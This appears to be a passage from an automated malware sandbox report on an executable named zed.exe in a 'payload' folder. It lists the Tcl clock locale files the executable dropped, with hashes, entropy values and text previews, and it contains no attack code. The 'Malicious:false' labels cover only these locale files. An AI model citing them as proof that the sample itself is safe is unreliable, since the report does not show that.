                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoGNv+IZoGU3v6ry/5oGNo+3v+6f6HyFvn:4EnLB383Zvlw3v6ry/ZF3vmSVn
                                                                                                                                                                                                                                            MD5:67368E8A5715860BABD44E54A168192F
                                                                                                                                                                                                                                            SHA1:7790D4B4B28FE5E38AB11CD037FFB826A8EB77FD
                                                                                                                                                                                                                                            SHA-256:B7B1D379355A1D278E13EF557A887A662E84FB6A9B62B8E19A27927926270EF9
                                                                                                                                                                                                                                            SHA-512:E95C90CFFA7CC4E61026FC328A4AA0BEE6A54A0061BA0B9459F9F0F4B008DD36F81BC9B8D8B964FA051FCEAB7FECE6D107CD456B3FD01A83B4900ECC3A0BCFA4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):957
                                                                                                                                                                                                                                            Entropy (8bit):4.018924167342869
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383Zm/aufodZmt+JHEA7UVRosmAL/7Idzr43xRRosuL1PJHWZ6tHhHjv:4aR83ZsauSHJkA7umE/72UD21PJWZ0hT
                                                                                                                                                                                                                                            MD5:7E6A943B7D82404F61BDBD95682073CD
                                                                                                                                                                                                                                            SHA1:B96DBB1738F293D2842FDCEDF2DEF13004F77A8D
                                                                                                                                                                                                                                            SHA-256:970B2F3ECC04980FCC2F9531CA6CE2BF36BC12942CB614BF70313B4CB0508985
                                                                                                                                                                                                                                            SHA-512:12F5A5F7A170EE79D1F4398E96FF2DE84472027C5B5003DE7E86F46713E3F0997439E2EBA03FFB7DB611F0CE0E06EB149F5BD08ED2AA0409DB8348867487FFFD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \.. "Aha"\.. "Isn"\.. "Sei"\.. "Rab"\.. "Kha"\.. "Jum"\.. "Sab"].. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \.. "Ahad"\.. "Isnin"\.. "Selasa"\.. "Rahu"\.. "Khamis"\.. "Jumaat"\.. "Sabtu"].. ::msgcat::mcset ms MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mac"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ogos"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dis"\.. ""].. ::msgcat::mcset ms MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Mac"\.. "April"\.. "Mei"\.. "Jun"\.. "Julai"\.. "Ogos"\.. "September"\.. "Oktober"\.. "November"\.. "Disember"\.. ""]..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                                                            Entropy (8bit):4.818053174805798
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoChFfluoChF+3v6xyFjoCh++3vflm68vn:4EnLB383xPflwe3v6gZl3vflm6+n
                                                                                                                                                                                                                                            MD5:A02F11BE0DF920E63E7A3ACCE746E32D
                                                                                                                                                                                                                                            SHA1:4A8B1EF1A6F8A5FD022042D6E009A01E4B0FEBD3
                                                                                                                                                                                                                                            SHA-256:F5B859D8DD2A2B5F756E39B0DFEB26B95878D2F54BA3CE46C56F0F26CF2B554B
                                                                                                                                                                                                                                            SHA-512:5F9AF8C89F491CB4C158ED73EA4CF32E6A83CF44A94DA6FE1A962C58199BF2348530F3DEFA0C6F433BA3ADEF81AE9B3884F30CD7A841B159D52F9F21008B4F92
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):717
                                                                                                                                                                                                                                            Entropy (8bit):4.55153350337982
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:4EnLB383VYmxWHWog4QUbxMmAMMiGZu+3v6ay/GK3vZsSVn:4aR83VYsxonQ2MmVVGRvjCGsvGSV
                                                                                                                                                                                                                                            MD5:D8BBEC2F8935054E6081BB5E4AE8F7E3
                                                                                                                                                                                                                                            SHA1:33FE6D51A284B8760BC6F442329B10374F506BDA
                                                                                                                                                                                                                                            SHA-256:7DBC4E82D82FDE8CDF522FA10E082289D46B0C1A4A7D7A5FA83FF116677F052B
                                                                                                                                                                                                                                            SHA-512:BF39C75DD6B3625897D7D44AC253AF5656CA21D0B394F78611584E2606CBC419C4A02353542D23393BEBCCF0CB4D861CDECD61AD89339F78C0260E966B495777
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \.. "\u0126ad"\.. "Tne"\.. "Tli"\.. "Erb"\.. "\u0126am"\.. "\u0120im"].. ::msgcat::mcset mt MONTHS_ABBREV [list \.. "Jan"\.. "Fra"\.. "Mar"\.. "Apr"\.. "Mej"\.. "\u0120un"\.. "Lul"\.. "Awi"\.. "Set"\.. "Ott"\.. "Nov"].. ::msgcat::mcset mt BCE "QK".. ::msgcat::mcset mt CE "".. ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y".. ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1209
                                                                                                                                                                                                                                            Entropy (8bit):4.313626715960843
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83B0tSYuZrIsmYmPAxyIQ4HU92W16EL3Tvav31:43qhuZrIPAt04yTcF
                                                                                                                                                                                                                                            MD5:42D02C3CAF28BE4994F27CEF5A183AB7
                                                                                                                                                                                                                                            SHA1:DC411E8AC12C3D588AB2F3A3C95A75D8689AD402
                                                                                                                                                                                                                                            SHA-256:534C5DACEF12F818FAF4ED806997A559F95D591F1B6236B0C30B07A107DD13F3
                                                                                                                                                                                                                                            SHA-512:0BE27572106324FE2B6CDFF4513500DE7582AD1ABEF451FFC62B2050D3875A149DDDB66451E1B3F5BA9216268E9998D2A1C1E8343BBB9EF97947DA054B82818E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset nb MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nb MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nb BC
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1129
                                                                                                                                                                                                                                            Entropy (8bit):4.235969198645435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR837Ed+RxRMZZsmUmnZAEEHM92WFU5vtrvs:43AAHRMZZPnZALsCtt7s
                                                                                                                                                                                                                                            MD5:B9B949794203D204628D4DBEA29587AE
                                                                                                                                                                                                                                            SHA1:1642D8040144469B5C359E80693E68036F87B849
                                                                                                                                                                                                                                            SHA-256:9E2FE3851CF13EC79A9B10A09B01CEB0A26044AE0DC90A4E00BE57745E854C79
                                                                                                                                                                                                                                            SHA-512:0CCCCF6D61423CEE0389C3BA1A8E94F2B092C53465D1937F5595AF91E46DD38B318D6C7EE3D88B89F32BFB952C0D55E0E67B46D7DF306ECA6690E283ADEB2CB9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl DAYS_OF_WEEK_ABBREV [list \.. "zo"\.. "ma"\.. "di"\.. "wo"\.. "do"\.. "vr"\.. "za"].. ::msgcat::mcset nl DAYS_OF_WEEK_FULL [list \.. "zondag"\.. "maandag"\.. "dinsdag"\.. "woensdag"\.. "donderdag"\.. "vrijdag"\.. "zaterdag"].. ::msgcat::mcset nl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mrt"\.. "apr"\.. "mei"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset nl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "maart"\.. "april"\.. "mei"\.. "juni"\.. "juli"\.. "augustus"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset nl DATE_FORM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.865165930946383
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo4gPPdjog9X3vLjog9X3v6mjo49+3vnFDoAkvn:4EnLB3835gHdPF3vjF3v64I3v9dmn
                                                                                                                                                                                                                                            MD5:3261F397ED0291368FF1881E7BA08ECE
                                                                                                                                                                                                                                            SHA1:7147ABB62034EB152B1FED9246A533535F07372C
                                                                                                                                                                                                                                            SHA-256:77A69DD60D171B321512B14794E75A66FF753410C007997B310790D86E09B057
                                                                                                                                                                                                                                            SHA-512:C1526F454FA594DAD056B056F76F01D8B2AB713D04EB2A3643416B8E741B248CC94E000BAEE5B0F60436B88B1216FB1DE7F7C3FA456D4A4FBDE24F97C3B739B8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nl_BE DATE_FORMAT "%d-%m-%y".. ::msgcat::mcset nl_BE TIME_FORMAT "%T".. ::msgcat::mcset nl_BE TIME_FORMAT_12 "%T".. ::msgcat::mcset nl_BE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1200
                                                                                                                                                                                                                                            Entropy (8bit):4.282788574144479
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83tCtrJwuQrIsmYmLAxyIQ4HU92W1W4/3Hv+v31:434suQrILAt0EafIF
                                                                                                                                                                                                                                            MD5:985E97517C2BF37719A618F575DF392C
                                                                                                                                                                                                                                            SHA1:65BC07FC3A955300ED09B7485F90AEC18CBAD43F
                                                                                                                                                                                                                                            SHA-256:06FA2D6D8C59D0B8EAC2EDE5AB0DDB8B6E095D1A023B1966FCE3B65916FA14FB
                                                                                                                                                                                                                                            SHA-512:75BC14DBAD147A98D32D2AF0BE0BE50F115BB9C3BBE283B53977B9F264A055734B30F6B1C4EEE9686F1874D178C535111731C92D495B7D370FB17213B65C9A40
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset nn DAYS_OF_WEEK_ABBREV [list \.. "su"\.. "m\u00e5"\.. "ty"\.. "on"\.. "to"\.. "fr"\.. "lau"].. ::msgcat::mcset nn DAYS_OF_WEEK_FULL [list \.. "sundag"\.. "m\u00e5ndag"\.. "tysdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "laurdag"].. ::msgcat::mcset nn MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "mai"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "des"\.. ""].. ::msgcat::mcset nn MONTHS_FULL [list \.. "januar"\.. "februar"\.. "mars"\.. "april"\.. "mai"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "desember"\.. ""].. ::msgcat::mcset nn BCE "f.Kr."
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                                                                                            Entropy (8bit):4.459506202908786
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83lUj0ORGgIzdW6RDYKG7FwRc0ypvOvX:43+HMg2W6RDYnFwRc0ydYX
                                                                                                                                                                                                                                            MD5:79AB7C13AA3833A1DAEADDB1144CCE55
                                                                                                                                                                                                                                            SHA1:C01ABC2F16549CAEC6B081448B2CBA88A680E250
                                                                                                                                                                                                                                            SHA-256:61462C325DB0065352D8155307F949869862A86CAC67AD7BB6703F57A7FA2FF3
                                                                                                                                                                                                                                            SHA-512:79EB696164FDDD9B121558C2780E54E295FF2DC4D8E87A0DE507B4F2925612721A98FF5010199CB68CF894ACA7A07884E9E02F3DC1E078D241431E3DC884C0A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pl DAYS_OF_WEEK_ABBREV [list \.. "N"\.. "Pn"\.. "Wt"\.. "\u015ar"\.. "Cz"\.. "Pt"\.. "So"].. ::msgcat::mcset pl DAYS_OF_WEEK_FULL [list \.. "niedziela"\.. "poniedzia\u0142ek"\.. "wtorek"\.. "\u015broda"\.. "czwartek"\.. "pi\u0105tek"\.. "sobota"].. ::msgcat::mcset pl MONTHS_ABBREV [list \.. "sty"\.. "lut"\.. "mar"\.. "kwi"\.. "maj"\.. "cze"\.. "lip"\.. "sie"\.. "wrz"\.. "pa\u017a"\.. "lis"\.. "gru"\.. ""].. ::msgcat::mcset pl MONTHS_FULL [list \.. "stycze\u0144"\.. "luty"\.. "marzec"\.. "kwiecie\u0144"\.. "maj"\.. "czerwiec"\.. "lipiec"\.. "sierpie\u0144"\.. "wrzesie\u0144"\.. "pa\u017adziernik"\.. "listopad"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1177
                                                                                                                                                                                                                                            Entropy (8bit):4.394980756969744
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83CYkjBc1yHYJt//0/I31YMY47flV7YaqgCyt9Fo8g6Gtvt76svi:43C5LHcNnxJ9Ltg6Gpt76Ki
                                                                                                                                                                                                                                            MD5:8F53B3571DD29E12BD33349CFA32F28F
                                                                                                                                                                                                                                            SHA1:C125E059B8BFE5FECD482D1A1DA50B8678872BF6
                                                                                                                                                                                                                                            SHA-256:6F6EEEDDCF232BDCB952592A144810CED44A1CBB4BCC2C062D5F98D441505380
                                                                                                                                                                                                                                            SHA-512:5CD7E7097B720E5399795126A71348816CBA697FD8F14160779E982ADAB00D5994978E2F9445785B0DE62F6F14232278AD1A65BC53730CA58D676B057F0BC406
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt DAYS_OF_WEEK_ABBREV [list \.. "Dom"\.. "Seg"\.. "Ter"\.. "Qua"\.. "Qui"\.. "Sex"\.. "S\u00e1b"].. ::msgcat::mcset pt DAYS_OF_WEEK_FULL [list \.. "Domingo"\.. "Segunda-feira"\.. "Ter\u00e7a-feira"\.. "Quarta-feira"\.. "Quinta-feira"\.. "Sexta-feira"\.. "S\u00e1bado"].. ::msgcat::mcset pt MONTHS_ABBREV [list \.. "Jan"\.. "Fev"\.. "Mar"\.. "Abr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Set"\.. "Out"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset pt MONTHS_FULL [list \.. "Janeiro"\.. "Fevereiro"\.. "Mar\u00e7o"\.. "Abril"\.. "Maio"\.. "Junho"\.. "Julho"\.. "Agosto"\.. "Setembro"\.. "Outubro"\.. "Novembro"\.. "Dezembro"
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.8608779725401785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xofm6GPWWjofAW3vLjofAW3v6mjofm6T+3vnFDoAkvn:4EnLB383+NGdg93vk93v6fNK3v9dmn
                                                                                                                                                                                                                                            MD5:A2626EA95C2480FEA68906AE6A1F6993
                                                                                                                                                                                                                                            SHA1:A0592902337C00FC2E70B1DFB3A42453A86535BB
                                                                                                                                                                                                                                            SHA-256:320BE7D5B730091E6FA35F196314737261C8E154577DCF6AC8C2057D44394AD7
                                                                                                                                                                                                                                            SHA-512:9801A87D024565676D4F3EAF0702C213E59FC2B6719D8BE95C19C9ED53FC43487F65F5408378B401A2B4C2BD4E2E391C2D848CA87739A6082AB7766EC6B9EFE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset pt_BR DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset pt_BR TIME_FORMAT "%T".. ::msgcat::mcset pt_BR TIME_FORMAT_12 "%T".. ::msgcat::mcset pt_BR DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1224
                                                                                                                                                                                                                                            Entropy (8bit):4.350784108088039
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83coPUMSeZmkTMm41icpK+7ZVoImEcVUCWdvHvWIn:43lPHFmkm1iMVoxEc+CWZPWIn
                                                                                                                                                                                                                                            MD5:F6575EC17966320106FF7ABDFB3186E2
                                                                                                                                                                                                                                            SHA1:68C6B72D664FDA27450FCE8B5734AB627CE825D7
                                                                                                                                                                                                                                            SHA-256:25ED6AC7A353E23B954B98611AE3B7E56BDCF2B0CB0DB358253CFB8BEBBB831C
                                                                                                                                                                                                                                            SHA-512:E564543231922A17C898419545BFA65E5E31FE9F005FDD201B735CFDE08E96FB3B98349C2A7959E29CA8F7E6934B0C4C6DE6B5E67209D0DD9A7746DFEBF037B3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ro DAYS_OF_WEEK_ABBREV [list \.. "D"\.. "L"\.. "Ma"\.. "Mi"\.. "J"\.. "V"\.. "S"].. ::msgcat::mcset ro DAYS_OF_WEEK_FULL [list \.. "duminic\u0103"\.. "luni"\.. "mar\u0163i"\.. "miercuri"\.. "joi"\.. "vineri"\.. "s\u00eemb\u0103t\u0103"].. ::msgcat::mcset ro MONTHS_ABBREV [list \.. "Ian"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mai"\.. "Iun"\.. "Iul"\.. "Aug"\.. "Sep"\.. "Oct"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset ro MONTHS_FULL [list \.. "ianuarie"\.. "februarie"\.. "martie"\.. "aprilie"\.. "mai"\.. "iunie"\.. "iulie"\.. "august"\.. "septembrie"\.. "octombrie"\.. "noiembrie"\.. "decembrie"\.. ""].. ::msgcat:
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                                                                                            Entropy (8bit):4.2886524607041006
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43D+pQ7keidQfRQPgQHB81Z/sFIAZSQWQXQrQxJQjQRnQBFQiWftkWt:26pgkeoSnpjA4tMYiJcCMFmVRt
                                                                                                                                                                                                                                            MD5:9F1C8DD58550558977821FD500E7C0E0
                                                                                                                                                                                                                                            SHA1:EFDD809BC2872A5BE0E353D31BE6D7D72E4B829C
                                                                                                                                                                                                                                            SHA-256:BB35BB6F07BAEF72C329EC3E95D6527A2736070EE2FFE5DE227E1FF0332390F8
                                                                                                                                                                                                                                            SHA-512:AA3C5C40AE9D342F8287958355C3321CF60566AD3E84E3D18D782FC022A998DA275506A61010A65D2E7D7578F2919C47C63AB0BA63A38800AA48D4B88ACE54D3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru DAYS_OF_WEEK_ABBREV [list \.. "\u0412\u0441"\.. "\u041f\u043d"\.. "\u0412\u0442"\.. "\u0421\u0440"\.. "\u0427\u0442"\.. "\u041f\u0442"\.. "\u0421\u0431"].. ::msgcat::mcset ru DAYS_OF_WEEK_FULL [list \.. "\u0432\u043e\u0441\u043a\u0440\u0435\u0441\u0435\u043d\u044c\u0435"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440\u0433"\.. "\u043f\u044f\u0442\u043d\u0438\u0446\u0430"\.. "\u0441\u0443\u0431\u0431\u043e\u0442\u0430"].. ::msgcat::mcset ru MONTHS_ABBREV [list \.. "\u044f\u043d\u0432"\.. "\u0444\u0435\u0432"\.. "\u043c\u0430\u0440"\.. "\u0430\u043f\u0440"\.. "\u043c\u0430\u0439"\.. "\u0438\u044e\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):248
                                                                                                                                                                                                                                            Entropy (8bit):4.9420431225061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoVAgWIZoVY9X3vtfNrsoVA9+3vW6Q9vn:4EnLB383SFWIyaX3vtNl/3vWHNn
                                                                                                                                                                                                                                            MD5:DC98D88964650E302BE97FDB3B33326E
                                                                                                                                                                                                                                            SHA1:1DDDCC4265D7B980B867FEE674BEF2FD87D823F7
                                                                                                                                                                                                                                            SHA-256:13E4E79A0ED82034BADE0CFF8DEF5DE1222F6968108AD710662BDB7DAF36D7E1
                                                                                                                                                                                                                                            SHA-512:F3B9D528C529DD520FEDA3C20ED354E521C5B3C29F3317E15B7939CE06A3D67554D34DD6E54FE038585E46C560C604A1FD7E7F84914086B5994D52CE2C9E99CE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ru_UA DATE_FORMAT "%d.%m.%Y".. ::msgcat::mcset ru_UA TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset ru_UA DATE_TIME_FORMAT "%d.%m.%Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1212
                                                                                                                                                                                                                                            Entropy (8bit):4.359036493565628
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83/YIXo4YY0dD6kMm7fX2NaSIvZdHZgHZ/IxvaGWxvtl9svWTN:43rLTR44/yWltOWB
                                                                                                                                                                                                                                            MD5:E297221FA73BD78577B398BC7D061D21
                                                                                                                                                                                                                                            SHA1:F2A6B456272F913A9E97C495CEE73AC774C90FA1
                                                                                                                                                                                                                                            SHA-256:E65D6E5E837DF0A2DF0DB77BCE45334BBC27EFFF9023C37119E75D49932D9D6C
                                                                                                                                                                                                                                            SHA-512:AB9DDAE7CB21193C7753041F0B88CF2D40987E7E604B47816219458D217F084AA4EBF36719E22AAB3FD71A271D9F956ADC353182991903D7ADE8C8F00F6B2F9B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sh DAYS_OF_WEEK_ABBREV [list \.. "Ned"\.. "Pon"\.. "Uto"\.. "Sre"\.. "\u010cet"\.. "Pet"\.. "Sub"].. ::msgcat::mcset sh DAYS_OF_WEEK_FULL [list \.. "Nedelja"\.. "Ponedeljak"\.. "Utorak"\.. "Sreda"\.. "\u010cetvrtak"\.. "Petak"\.. "Subota"].. ::msgcat::mcset sh MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maj"\.. "Jun"\.. "Jul"\.. "Avg"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset sh MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "Mart"\.. "April"\.. "Maj"\.. "Juni"\.. "Juli"\.. "Avgust"\.. "Septembar"\.. "Oktobar"\.. "Novembar"\.. "Decembar"\.. ""].. ::msgcat::mcset sh BC
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1255
                                                                                                                                                                                                                                            Entropy (8bit):4.4043119723436135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83c46o40u3rIsmJIcm93ApLDVb2IcU95WFGEXF3eUCvtz/v3e6:43c3ow3rF93Ap7tEXFREtznp
                                                                                                                                                                                                                                            MD5:24DA40901D907D35195CC1B3A675EBC7
                                                                                                                                                                                                                                            SHA1:8AF31248F06FADA5CFB0D83A940CFF5CE70E2577
                                                                                                                                                                                                                                            SHA-256:976813F6C53C9BEBBF976B0F560FD7FC5E4EC4C574D7E1CD31F9A4056765CB7A
                                                                                                                                                                                                                                            SHA-512:A9BC6AAFE9AEEDFD1E483E54A2D27871A09ADD6807D8F90410CD2BB82A91BA9DF435652EC9A7C3AD0A080D7F153CA848BB47DAD3936BA30E4AEFF3C474C433CC
                                                                                                                                                                                                                                            Malicious:false
